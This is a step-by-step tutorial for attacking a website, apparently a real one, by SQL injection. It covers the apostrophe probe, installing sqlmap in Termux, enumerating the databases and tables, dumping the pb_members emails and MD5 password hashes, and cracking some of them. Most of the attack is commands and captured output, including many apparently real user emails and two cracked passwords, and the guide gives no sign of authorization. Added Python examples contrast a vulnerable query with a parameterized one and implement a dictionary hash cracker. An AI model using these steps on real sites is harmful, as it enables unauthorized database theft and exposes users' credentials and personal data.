- to check whether a page is vulnerable, add a ' (single quote) to the end of the URL parameter value
- like this:
- http://www.100safe.com/user.php?uid=46
- becomes:
- http://www.100safe.com/user.php?uid=46'
- if the parameter is pasted straight into the query text, the quote breaks the SQL syntax and the site leaks a database error somewhere on the page, like this one from MySQL:
- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
- (no visible error does not prove the parameter is safe: blind injections show no message at all, which is what sqlmap's later tests are for)
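- the apostrophe test works because the server concatenates the parameter into the SQL it runs. The following is an added illustration, not code from the original paste or from the site it describes: it uses Python's built-in sqlite3 instead of the target's MySQL (so the error text differs from the MySQL message quoted above) and a small constructed member table, and shows the vulnerable query pattern next to the parameterized version that the same probe cannot break.

```python
import sqlite3

# Constructed stand-in for the target's member table; these rows are example
# data invented for this illustration, not data from any real site.
SAMPLE_ROWS = [
    (45, "alice", "e10adc3949ba59abbe56e057f20f883e"),
    (46, "bob",   "dd3cda213b3da62490992d6a5e181874"),
    (47, "carol", "1786ec46a1e6b28d3ede31ff2c4bf78b"),
]


def make_db():
    """In-memory SQLite database with a pb_members-shaped table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE pb_members (uid INTEGER, username TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO pb_members VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, uid):
    """The bug behind user.php?uid=46: the raw parameter is pasted into the
    SQL text, so whatever the client appends is parsed as SQL."""
    sql = "SELECT uid, username FROM pb_members WHERE uid = " + uid
    return conn.execute(sql).fetchall()


def lookup_safe(conn, uid):
    """Same query with a bound parameter: the value travels to the engine
    separately from the statement, so a quote in it cannot alter the syntax."""
    sql = "SELECT uid, username FROM pb_members WHERE uid = ?"
    return conn.execute(sql, (uid,)).fetchall()


def probe(conn, lookup, uid):
    """Run one lookup the way the apostrophe test does and classify the result.
    Returns ("ok", rows) or ("error", message); a database error echoed back
    to the page is the signal the test looks for."""
    try:
        return ("ok", lookup(conn, uid))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    db = make_db()
    for uid in ("46", "46'", "46 OR 1=1"):
        print(f"vulnerable uid={uid!r}: {probe(db, lookup_vulnerable, uid)}")
        print(f"safe       uid={uid!r}: {probe(db, lookup_safe, uid)}")
```

- with the vulnerable lookup, uid=46' raises a syntax error and uid=46 OR 1=1 returns every row; with the bound parameter the same inputs just match nothing, which is why sqlmap finds nothing to work with on a parameterized query.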
- now install and open Termux (the Android terminal app).
- first install python and unzip. Termux's package manager is pkg, so type:
- pkg install python2 unzip
- (recent Termux releases no longer ship python2; sqlmap also runs on Python 3, so pkg install python unzip and then python sqlmap.py work the same way)
- download the latest sqlmap zip package from sqlmap.org (it lands in /sdcard/Download)
- run termux-setup-storage once so Termux is allowed to read /sdcard, then run these three commands:
- cd /sdcard/Download/
- unzip sqlmap*.zip
- cd sqlmap*
- now we get started!
- first list the databases on the target server with this command (quote the URL so the shell does not treat the ? as a wildcard):
- python2 sqlmap.py --url="http://www.100safe.com/user.php?uid=46" --dbs
- output like this means sqlmap's quick heuristic thinks the parameter is worth testing; it is only a hint, and the site is confirmed vulnerable only when the tests that follow report a working injection technique:
- [10:57:59] [INFO] heuristic (basic) test shows that GET parameter 'uid' might be injectable (possible DBMS: 'MySQL')
- [10:58:00] [INFO] heuristic (XSS) test shows that GET parameter 'uid' might be vulnerable to cross-site scripting (XSS) attacks
- [10:58:00] [INFO] testing for SQL injection on GET parameter 'uid'
- once it asks this:
- it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
- type Y then press enter
- next you will get this
- for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
- type Y then press enter
- once the tests finish and sqlmap has found a working injection technique it fetches the database names; the output should look like this (the "resumed:" lines mean the values were read back from the session file of an earlier run against the same target; a first run prints "retrieved:" instead):
- [10:05:15] [INFO] fetching database names
- [10:05:15] [INFO] used SQL query returns 8 entries
- [10:05:15] [INFO] resumed: information_schema
- [10:05:15] [INFO] resumed: 100safe
- [10:05:15] [INFO] resumed: Iloveyou
- [10:05:15] [INFO] resumed: hypocket_api
- [10:05:15] [INFO] resumed: mysql
- [10:05:15] [INFO] resumed: now
- [10:05:15] [INFO] resumed: performance_schema
- [10:05:15] [INFO] resumed: superpay_api
- available databases [8]:
- [*] 100safe
- [*] hypocket_api
- [*] Iloveyou
- [*] information_schema
- [*] mysql
- [*] now
- [*] performance_schema
- [*] superpay_api
- ^ those are the databases on the vulnerable server (information_schema, mysql and performance_schema are MySQL's own system databases; the application data is in the others).
- to list the tables in a database use this command:
- python2 sqlmap.py --url="http://www.100safe.com/user.php?uid=46" -D 100safe --tables
- the output should look like this:
- [10:07:32] [INFO] fetching tables for database: '100safe'
- [10:07:32] [INFO] used SQL query returns 39 entries
- Database: 100safe
- [39 tables]
- +------------------+
- | pb_admingroups |
- | pb_adminlogs |
- | pb_adminonlines |
- | pb_announcements |
- | pb_applyinvite |
- | pb_attachments |
- | pb_categories |
- | pb_cdata |
- | pb_comments |
- | pb_commonlogs |
- | pb_configs |
- | pb_friends |
- | pb_fsession |
- | pb_guestmsg |
- | pb_invitecode |
- | pb_links |
- | pb_memberdata |
- | pb_memberexp |
- | pb_members |
- | pb_message |
- | pb_onlines |
- | pb_plugins |
- | pb_regions |
- | pb_scaches |
- | pb_sitestat |
- | pb_special |
- | pb_splink |
- | pb_tagcache |
- | pb_tags |
- | pb_tdata |
- | pb_templates |
- | pb_threads |
- | pb_threads_home |
- | pb_threads_tmp |
- | pb_tinfo |
- | pb_tinfo_home |
- | pb_tinfo_tmp |
- | pb_tplvar |
- | pb_usergroups |
- +------------------+
- ^ those are the tables in the database "100safe"
- the table worth dumping (reading out) is pb_members, because a table with that name almost certainly holds the user accounts and their password hashes.
- first we have to list the columns in the table. type in this command:
- python2 sqlmap.py --url="http://www.100safe.com/user.php?uid=46" -D 100safe -T pb_members --columns
- the columns look similar to this for most user tables; a password column of type char(32) is a strong hint that it holds unsalted hex MD5 hashes:
- [10:25:43] [INFO] fetching columns for table 'pb_members' in database '100safe'
- [10:25:43] [INFO] used SQL query returns 9 entries
- [10:25:43] [INFO] resumed: uid
- [10:25:43] [INFO] resumed: mediumint(8) unsigned
- [10:25:43] [INFO] resumed: username
- [10:25:43] [INFO] resumed: varchar(20)
- [10:25:43] [INFO] resumed: password
- [10:25:43] [INFO] resumed: char(32)
- [10:25:43] [INFO] resumed: email
- [10:25:43] [INFO] resumed: varchar(100)
- [10:25:43] [INFO] resumed: adminid
- [10:25:43] [INFO] resumed: tinyint(3)
- [10:25:43] [INFO] resumed: groupid
- [10:25:43] [INFO] resumed: tinyint(3)
- [10:25:43] [INFO] resumed: publicemail
- [10:25:43] [INFO] resumed: tinyint(1)
- [10:25:43] [INFO] resumed: regip
- [10:25:43] [INFO] resumed: char(15)
- [10:25:43] [INFO] resumed: regdate
- [10:25:43] [INFO] resumed: int(10) unsigned
- Database: 100safe
- Table: pb_members
- [9 columns]
- +-------------+-----------------------+
- | Column | Type |
- +-------------+-----------------------+
- | adminid | tinyint(3) |
- | email | varchar(100) |
- | groupid | tinyint(3) |
- | password | char(32) |
- | publicemail | tinyint(1) |
- | regdate | int(10) unsigned |
- | regip | char(15) |
- | uid | mediumint(8) unsigned |
- | username | varchar(20) |
- +-------------+-----------------------+
- now extract every entry in the columns email and password from that table:
- python2 sqlmap.py --url="http://www.100safe.com/user.php?uid=46" -D 100safe -T pb_members -C email,password --dump
- the passwords on this site are not stored in plaintext but as unsalted MD5 hashes (MD5 is a hash, not encryption, so there is no key to recover and the only way back to the password is guessing); sqlmap's built-in dictionary attack was still able to crack a couple.
- by the way, on other websites the passwords are sometimes stored in plaintext!
- here is the output, with the answers you should type at the prompts already filled in so you know what to do (this run was captured on a Windows machine, so the dictionary and CSV paths will differ under Termux):
- [10:30:15] [INFO] fetching entries of column(s) 'email, password' for table 'pb_members' in database '100safe'
- [10:30:15] [INFO] used SQL query returns 790 entries
- [10:30:15] [WARNING] reflective value(s) found and filtering out
- [10:30:15] [INFO] retrieved: 1786ec46a1e6b28d3ede31ff2c4bf78b
- [10:30:15] [INFO] retrieved: 2plwvce9@30spmcuw.com
- [10:30:16] [INFO] retrieved: 49ba8995a4ed9671a0f7b8460c8fdedc
- [10:30:16] [INFO] retrieved: 3216016593@qq.com
- [10:30:16] [INFO] retrieved: b79b84652032835f635b4d0d4dd149e3
- [10:30:17] [INFO] retrieved: 39p532uq@5jbrl7qb.com
- [10:30:17] [INFO] retrieved: d8a79e5469223f6800448a2e247efdb7
- [10:30:17] [INFO] retrieved: 3e3yng79@r5odsr8g.com
- [10:30:17] [INFO] retrieved: 3653f8e024ade70beaf337c647af8eda
- [10:30:18] [INFO] retrieved: 3ioo9ytx@17igz8i8.com
- [10:30:18] [INFO] retrieved: d958f8dec96e85768387583d4cbb26dc
- [10:30:18] [INFO] retrieved: 3vxah88n@eoguvus4.com
- [10:30:19] [INFO] retrieved: 76ee1658d44021e53831bce63a465b37
- [10:30:19] [INFO] retrieved: 43w6ua0g@3cmq9zgd.com
- [10:30:19] [INFO] retrieved: fef3d38d2fed7a7f9d1c7f29a2c67a83
- [10:30:19] [INFO] retrieved: 446382023@qq.com
- [10:30:20] [INFO] retrieved: f96602e40dde4889fc2da79c3514abf3
- [10:30:20] [WARNING] user aborted during enumeration. sqlmap will display partial output
- [10:30:20] [INFO] recognized possible password hashes in column 'password'
- do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
- do you want to crack them via a dictionary-based attack? [Y/n/q] Y
- [10:30:31] [INFO] using hash method 'md5_generic_passwd'
- what dictionary do you want to use?
- [1] default dictionary file 'C:\Users\New Owner\Desktop\Cracking\sqlmapproject-s
- qlmap-5e2d0bd\txt\wordlist.zip' (press Enter)
- [2] custom dictionary file
- [3] file with list of dictionary files
- > 1
- [10:30:35] [INFO] using default dictionary
- do you want to use common password suffixes? (slow!) [y/N] N
- [10:30:38] [INFO] starting dictionary-based cracking (md5_generic_passwd)
- [10:30:38] [INFO] starting 2 processes
- [10:30:44] [INFO] cracked password '19850110' for hash 'dd3cda213b3da62490992d6a5e181874'
- [10:30:45] [INFO] cracked password '123456' for hash 'e10adc3949ba59abbe56e057f20f883e'
- Database: 100safe
- Table: pb_members
- [27 entries]
- +------------------------+---------------------------------------------+
- | email | password |
- +------------------------+---------------------------------------------+
- | 03ac6xea@fvhpa9ch.com | d6ff2b7b856f3b445340e9ccdf157929 |
- | 0408eric@pchome.com.tw | c96a267ff0f21de27cc50f9c45c3b8fb |
- | 07fff12w@quamhish.com | 891cbd7089d0e9f11a271b01cdf46e74 |
- | 0980155147@qma.com.tw | dd3cda213b3da62490992d6a5e181874 (19850110) |
- | 0azdydba@acaajp4m.com | 1b6b638cc4d1d7d32928e2f9b80b1797 |
- | 0bbgzl32@jssm911y.com | 1947e832f3baf43b0b4b5f5917ea1df5 |
- | 0ojrmsbz@ybru62d2.com | a38fcd68f6d7639ce1562020dd7e20e3 |
- | 0qgl9cts@qp6ccox9.com | 0385ee7071f1bb3f8712583f881b02ab |
- | 0xq4trm9@h5rzk35x.com | 8adfb726303aa07c55dc7b255e67ad4b |
- | 1048825dfdf152@qq.com | 02569624d5d0f06b17715d93d9eccc96 |
- | 1312760466@qq.com | e10adc3949ba59abbe56e057f20f883e (123456) |
- | 1598784253@qq.com | b71588f2be4628689b70beee50fe760f |
- | 1nca4m9o@zrr575k6.com | e3f87375269063de254da661034b537a |
- | 1nwpkj4a@iaysr57h.com | dddca8c5a130281102228c4b0f8b3b32 |
- | 1vml8miz@hadf8rqa.com | 6fe0ae027b11a404987d5431d71c2125 |
- | 2161283@163.com | e10adc3949ba59abbe56e057f20f883e (123456) |
- | 234owhb3@0ozh2tcs.com | 779ddc203741c1892a3456a951b73a9a |
- | 2ltlsq9i@cka0adls.com | 05494fa729bbefcf1acea2c180c7e04a |
- | 2nwy5tvv@rwe8lbpt.com | 1786ec46a1e6b28d3ede31ff2c4bf78b |
- | 2plwvce9@30spmcuw.com | 49ba8995a4ed9671a0f7b8460c8fdedc |
- | 3216016593@qq.com | b79b84652032835f635b4d0d4dd149e3 |
- | 39p532uq@5jbrl7qb.com | d8a79e5469223f6800448a2e247efdb7 |
- | 3e3yng79@r5odsr8g.com | 3653f8e024ade70beaf337c647af8eda |
- | 3ioo9ytx@17igz8i8.com | d958f8dec96e85768387583d4cbb26dc |
- | 3vxah88n@eoguvus4.com | 76ee1658d44021e53831bce63a465b37 |
- | 43w6ua0g@3cmq9zgd.com | fef3d38d2fed7a7f9d1c7f29a2c67a83 |
- | 446382023@qq.com | f96602e40dde4889fc2da79c3514abf3 |
- +------------------------+---------------------------------------------+
- [10:32:32] [INFO] table '`100safe`.pb_members' dumped to CSV file 'C:\Users\New Owner\.sqlmap\output\www.100safe.com\dump\100safe\pb_members.csv'
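- what sqlmap does at the "crack them via a dictionary-based attack" prompt is shown below as an added example; it is not sqlmap's own code and not part of the original paste. It hashes every wordlist candidate once and looks the digest up in the set of dumped hashes, which is exactly why unsalted MD5 falls so quickly. The wordlist, the suffix list and the sample rows are constructed for the example (two of the hashes are copied from the sqlmap output above); the real run uses sqlmap's txt/wordlist.zip.

```python
import hashlib


def md5_hex(text):
    """Hex MD5 of a string, the form stored in the char(32) password column."""
    return hashlib.md5(text.encode("utf-8")).hexdigest()


# Constructed wordlist standing in for sqlmap's txt/wordlist.zip (example data).
WORDLIST = ["password", "123456", "qwerty", "19850110", "letmein", "iloveyou"]

# Suffixes tried when the "common password suffixes" prompt is answered y.
# This short list is an assumption for the example; sqlmap's own list is longer.
COMMON_SUFFIXES = ["", "1", "12", "123", "!", "2020"]

# Rows in the same (email, password) shape as the dumped table above.
SAMPLE_DUMP = [
    ("1312760466@qq.com", "e10adc3949ba59abbe56e057f20f883e"),      # from the page: md5("123456")
    ("user@example.com", md5_hex("qwerty123")),                      # constructed: needs a suffix
    ("2nwy5tvv@rwe8lbpt.com", "1786ec46a1e6b28d3ede31ff2c4bf78b"),  # from the page: not in wordlist
    ("admin@example.com", "not-a-hash"),                             # constructed: plaintext, skipped
]


def looks_like_md5(value):
    """The 'recognized possible password hashes' step, reduced to hex MD5."""
    return (isinstance(value, str) and len(value) == 32
            and all(c in "0123456789abcdef" for c in value.lower()))


def crack_md5(hashes, wordlist, use_suffixes=False):
    """Return {hash: plaintext} for every hash whose preimage is in the wordlist.
    Each candidate is hashed once and checked against all targets at the same
    time, so cracking 790 hashes costs no more than cracking one."""
    wanted = {h.lower() for h in hashes if looks_like_md5(h)}
    found = {}
    suffixes = COMMON_SUFFIXES if use_suffixes else [""]
    for word in wordlist:
        for suffix in suffixes:
            candidate = word + suffix
            digest = md5_hex(candidate)
            if digest in wanted and digest not in found:
                found[digest] = candidate
                if len(found) == len(wanted):
                    return found          # nothing left to crack
    return found


def annotate_dump(rows, wordlist, use_suffixes=False):
    """Append ' (plaintext)' to every cracked hash, the way sqlmap's table does."""
    cracked = crack_md5([pw for _, pw in rows], wordlist, use_suffixes)
    out = []
    for email, pw in rows:
        plain = cracked.get(pw.lower()) if looks_like_md5(pw) else None
        out.append((email, f"{pw} ({plain})" if plain else pw))
    return out


if __name__ == "__main__":
    for email, pw in annotate_dump(SAMPLE_DUMP, WORDLIST, use_suffixes=True):
        print(f"{email:24} {pw}")
```

- a salted hash, or a slow password hash such as bcrypt, defeats this lookup: every user would need a separate pass over the wordlist, and each candidate would cost far more than one MD5.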
- you can speed up dumping by adding --threads=10 (the maximum sqlmap allows) to the dump command; it helps most with blind injections, where every character costs a separate request.
- adding --batch makes sqlmap take the default answer at every prompt, so a run needs no interaction.
- and that's basically it! that's pretty much all you need to know about sqlmap. happy hacking, mister 1337